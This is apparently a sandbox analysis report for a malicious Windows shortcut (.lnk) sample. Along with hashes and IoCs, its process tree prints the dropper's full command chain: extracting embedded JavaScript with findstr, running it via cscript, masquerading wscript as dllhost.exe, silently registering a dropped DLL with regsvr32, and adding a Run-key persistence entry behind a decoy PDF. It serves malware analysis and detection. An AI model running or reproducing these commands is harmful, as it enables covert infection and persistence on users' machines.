Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
191s -
max time network
216s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
18/11/2023, 02:49
Static task
static1
Behavioral task
behavioral1
Sample
c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
Resource
win10v2004-20231023-en
General
-
Target
c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
-
Size
345KB
-
MD5
ba26b003f8f8b00da1bb1e4c12d109cc
-
SHA1
a88b3cc71121c9b96053049892abb98b4db3eedc
-
SHA256
c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a
-
SHA512
580de04b864c1dca99635d96344a8e866353633c40d27c366d7d9bb6797ec43106044a071c86338457b3f935ab7f7294b72b2d165b45392bb28f1dda0db9ed48
-
SSDEEP
6144:ydr8fmEOmqG2K13qPIWAiC/Q5FNTrmwMtGQqOh5PAW7LebJcDgym8/kU0:0QDOmqzHPZAilTiwMtfh5P1Lo4kB
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1044 dllhost.exe -
Loads dropped DLL 2 IoCs
pid Process 2864 regsvr32.exe 1044 dllhost.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\libeay32.dll" regsvr32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE = "cmd /c start C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\~26210619.js" cscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX\CLSID regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC} regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\libeay32.dll" regsvr32.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1044 dllhost.exe 928 AcroRd32.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1044 dllhost.exe 928 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 928 AcroRd32.exe 928 AcroRd32.exe 928 AcroRd32.exe 928 AcroRd32.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 2600 wrote to memory of 1588 2600 cmd.exe 30 PID 2600 wrote to memory of 1588 2600 cmd.exe 30 PID 2600 wrote to memory of 1588 2600 cmd.exe 30 PID 1588 wrote to memory of 2608 1588 cmd.exe 31 PID 1588 wrote to memory of 2608 1588 cmd.exe 31 PID 1588 wrote to memory of 2608 1588 cmd.exe 31 PID 1588 wrote to memory of 2684 1588 cmd.exe 32 PID 1588 wrote to memory of 2684 1588 cmd.exe 32 PID 1588 wrote to memory of 2684 1588 cmd.exe 32 PID 1588 wrote to memory of 2492 1588 cmd.exe 33 PID 1588 wrote to memory of 2492 1588 cmd.exe 33 PID 1588 wrote to memory of 2492 1588 cmd.exe 33 PID 2492 wrote to memory of 1412 2492 cscript.exe 34 PID 2492 wrote to memory of 1412 2492 cscript.exe 34 PID 2492 wrote to memory of 1412 2492 cscript.exe 34 PID 2492 wrote to memory of 2180 2492 cscript.exe 36 PID 2492 wrote to memory of 2180 2492 cscript.exe 36 PID 2492 wrote to memory of 2180 2492 cscript.exe 36 PID 2492 wrote to memory of 2824 2492 cscript.exe 38 PID 2492 wrote to memory of 2824 2492 cscript.exe 38 PID 2492 wrote to memory of 2824 2492 cscript.exe 38 PID 2824 wrote to memory of 1044 2824 cmd.exe 40 PID 2824 wrote to memory of 1044 2824 cmd.exe 40 PID 2824 wrote to memory of 1044 2824 cmd.exe 40 PID 2824 wrote to memory of 1044 2824 cmd.exe 40 PID 1412 wrote to memory of 928 1412 cmd.exe 41 PID 1412 wrote to memory of 928 1412 cmd.exe 41 PID 1412 wrote to memory of 928 1412 cmd.exe 41 PID 1412 wrote to memory of 928 1412 cmd.exe 41 PID 1044 wrote to memory of 916 1044 dllhost.exe 42 PID 1044 wrote to memory of 916 1044 dllhost.exe 42 PID 1044 wrote to memory of 916 1044 dllhost.exe 42 PID 1044 wrote to memory of 916 1044 dllhost.exe 42 PID 916 wrote to memory of 2864 916 cmd.exe 44 PID 916 wrote to memory of 2864 916 cmd.exe 44 PID 916 wrote to memory of 2864 916 cmd.exe 44 PID 916 wrote to memory of 2864 916 cmd.exe 44 PID 916 wrote to memory of 2864 916 cmd.exe 44 PID 916 wrote to memory of 2864 916 cmd.exe 44 PID 916 wrote to memory of 2864 916 cmd.exe 44
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c DIR 000792244100393251090026219142\00157269330078632939 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk') do (if %~za gtr 79002 (findstr /b "var onm=" "%a" > C:\Users\Admin\AppData\Local\Temp\~26210619.js & cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9))&cls&exit2⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk3⤵PID:2608
-
-
C:\Windows\system32\findstr.exefindstr /b "var onm=" "C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk"3⤵PID:2684
-
-
C:\Windows\system32\cscript.execscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 93⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf4⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf"5⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\wscript.exe C:\Users\Admin\AppData\Local\Temp\dllhost.exe /y4⤵PID:2180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js4⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Users\Admin\AppData\Local\Temp\dllhost.exeC:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll6⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:2864
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
128KB
MD5c585f511f7edb1219e8f891de560614d
SHA17c7b4ac5f2fe5e3f2138a3945613f7823a00f9be
SHA256831d48b6ab77f6ece7b9549d1dfb6ccf87ff9b230d39c087637288520e4fd83b
SHA512e588162ce74b10880a18a4501a9ebe1f723cf5cbd7949f9d79db93b0625ffb7a5d72287db0a403b12c9bf69480ba9e74b55fe1c136765098a2826c4d7140ae64
-
Filesize
138KB
MD5d1ab72db2bedd2f255d35da3da0d4b16
SHA1860265276b29b42b8c4b077e5c651def9c81b6e9
SHA256047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0
SHA512b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185
-
Filesize
138KB
MD5d1ab72db2bedd2f255d35da3da0d4b16
SHA1860265276b29b42b8c4b077e5c651def9c81b6e9
SHA256047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0
SHA512b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185
-
Filesize
13KB
MD5e0b8dfd17b8e7de760b273d18e58b142
SHA1801509fb6783c9e57edc67a72dde3c62080ffbaf
SHA2564ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379
SHA512443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b
-
Filesize
343KB
MD5a585372367e029c2d987d6c6845f56e6
SHA1abedec3a0071e0df708f011b8e830017460f73bb
SHA256336262cb2d07a9cc6d844a5fbe7c2c85db5ff7d6d05d2f44c029f5baf29b9935
SHA512f0496c5020438d3b1d93bb61fb322ab7677b706f8e472e8f82524f8d43d87ae830d72357a5ba93ed26897b3f0dd9a28d134221b19b9c2063ed362a5f7c22ba4d
-
Filesize
3KB
MD528062c7f330be3fe2fae998b2b295a8c
SHA152ab4e915dc2572fea5d61b6e9150b5143a61c46
SHA2567ff10efff32397f8ff673ed8f24bb84ee1f6870a9fb49e9863294246425ccf91
SHA5120413bef499b73193ed2d1f442edf06951bd6f64c256ac79b756e3201b6060c4a8998b34a3bceb6b1721106503022cde4eae0202a9943eec62e6ecf28bff69cd3
-
Filesize
13KB
MD5e0b8dfd17b8e7de760b273d18e58b142
SHA1801509fb6783c9e57edc67a72dde3c62080ffbaf
SHA2564ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379
SHA512443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b
-
Filesize
13KB
MD5e0b8dfd17b8e7de760b273d18e58b142
SHA1801509fb6783c9e57edc67a72dde3c62080ffbaf
SHA2564ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379
SHA512443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b